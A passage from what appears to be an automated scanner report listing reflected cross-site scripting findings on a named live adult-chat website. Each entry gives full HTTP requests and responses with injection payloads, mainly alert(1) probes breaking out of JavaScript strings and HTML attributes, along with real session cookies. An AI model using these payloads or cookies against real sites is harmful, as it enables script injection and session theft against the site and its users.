GET /live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:33 GMT Connection: close Content-Length: 33515 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/lesbian/?af6d9"><a>bfa76ccfa1f=1"> ...[SNIP]...
2.99. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/live-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f783'-alert(1)-'ad3501b39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:16 GMT Connection: close Content-Length: 25590 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/?7f783'-alert(1)-'ad3501b39a0=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.100. http://imlive.com/live-sex-chats/live-sex-video/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/live-sex-video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6088"><a>d342b9399fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:03 GMT Connection: close Content-Length: 25443 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/live-sex-video/?e6088"><a>d342b9399fb=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.101. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/nude-chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acb7a'-alert(1)-'34ec5f17816 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:29 GMT Connection: close Content-Length: 23794 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/?acb7a'-alert(1)-'34ec5f17816=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.102. http://imlive.com/live-sex-chats/nude-chat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/nude-chat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f06eb"><a>2a1bdec8937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:23 GMT Connection: close Content-Length: 23647 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/nude-chat/?f06eb"><a>2a1bdec8937=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.103. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/orgies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44239'-alert(1)-'0a5659e80e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:29 GMT Connection: close Content-Length: 49856 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/?44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&qs=cat=1^roomid=14^44239'-alert(1)-'0a5659e80e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.104. http://imlive.com/live-sex-chats/orgies/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/orgies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b235"><a>bd631be4c53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/orgies/?4b235"><a>bd631be4c53=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:05 GMT Connection: close Content-Length: 49672 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/orgies/?4b235"><a>bd631be4c53=1"> ...[SNIP]...
2.105. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/pornstars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd6ca'-alert(1)-'66a39635b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:42 GMT Connection: close Content-Length: 266553 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/?dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&qs=cat=1^roomid=249^dd6ca'-alert(1)-'66a39635b46=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.106. http://imlive.com/live-sex-chats/pornstars/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/pornstars/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad2c2"><a>388c8c895ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/pornstars/?ad2c2"><a>388c8c895ab=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
